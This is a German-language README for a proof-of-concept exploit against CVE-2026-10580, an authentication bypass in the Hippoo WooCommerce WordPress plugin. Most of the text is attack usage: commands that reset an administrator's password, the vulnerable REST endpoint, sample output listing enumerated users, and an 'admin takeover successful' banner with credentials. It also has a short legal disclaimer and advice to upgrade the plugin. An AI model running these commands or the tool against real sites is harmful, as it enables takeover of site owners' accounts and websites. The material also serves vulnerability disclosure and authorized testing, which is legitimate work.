
PoC exploit for CVE-2026-10580 - Authentication Bypass in Hippoo Mobile App for WooCommerce <= 1.9.4 leading to Admin Account Takeover
Dieses Tool ist ein Proof-of-Concept-Exploit für CVE-2026-10580, eine Authentifizierungsumgehungs-Schwachstelle, die das Hippoo Mobile App für WooCommerce WordPress-Plugin (Versionen <= 1.9.4) betrifft. Die Schwachstelle ermöglicht es nicht authentifizierten Angreifern, das Passwort eines beliebigen Benutzers, einschließlich Administratoren, zurückzusetzen, was zur vollständigen Übernahme der Website führt.
⚠️ Wichtig: Dieses Tool ist nur für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal.
requests BibliothekAbhängigkeiten installieren:
pip install requests
python3 exploit.py -t https://target-site.com -p NewPassword123!
Exploit mit Standard-Admin-ID (1) und SSL-Überprüfung:
python3 exploit.py -t https://example.com -p PwnedCVE2026!!
Bestimmte Benutzer-ID anvisieren und SSL-Überprüfung deaktivieren:
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k
Ohne Banner ausführen:
python3 exploit.py -t https://example.com -p NewPass123 --no-banner
[+] Found 3 user(s)
- User ID: 1 | Username: admin | Role: administrator
- User ID: 2 | Username: editor_user | Role: editor
- User ID: 3 | Username: subscriber1 | Role: subscriber
╔══════════════════════════════════════════════════════════════╗
║ ADMIN TAKEOVER SUCCESSFUL ║
╚══════════════════════════════════════════════════════════════╝
Target: https://example.com
Login: https://example.com/wp-admin
Username: admin
Password: PwnedCVE2026!!
Wenn Sie das Hippoo-Plugin verwenden, aktualisieren Sie es sofort auf eine gepatchte Version (>1.9.4). Zusätzlich:
/wp-json/wc-hippoo/v1/ext/wp/v2/usersDieses Projekt ist unter der MIT-Lizenz lizenziert. Siehe LICENSE Datei für Details.
0xgh057r3c0n
Der Autor ist nicht verantwortlich für jeglichen Missbrauch dieses Tools. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben.
| Argument | Beschreibung |
|---|
-t, --target | Ziel-URL der WordPress-Website (z. B. https://example.com) |
-p, --password | Neues Passwort für das Administratorkonto |
-i, --id | Benutzer-ID für die Übernahme (Standard: 1) |
-k, --insecure | SSL-Zertifikatsprüfung überspringen |
--no-banner | ASCII-Banner unterdrücken |